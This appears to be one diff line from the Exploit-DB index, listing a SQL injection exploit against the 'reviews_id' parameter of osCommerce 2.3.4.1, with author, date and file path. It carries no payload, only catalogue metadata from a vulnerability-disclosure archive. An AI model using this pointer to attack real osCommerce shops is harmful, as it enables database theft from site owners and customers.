+46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80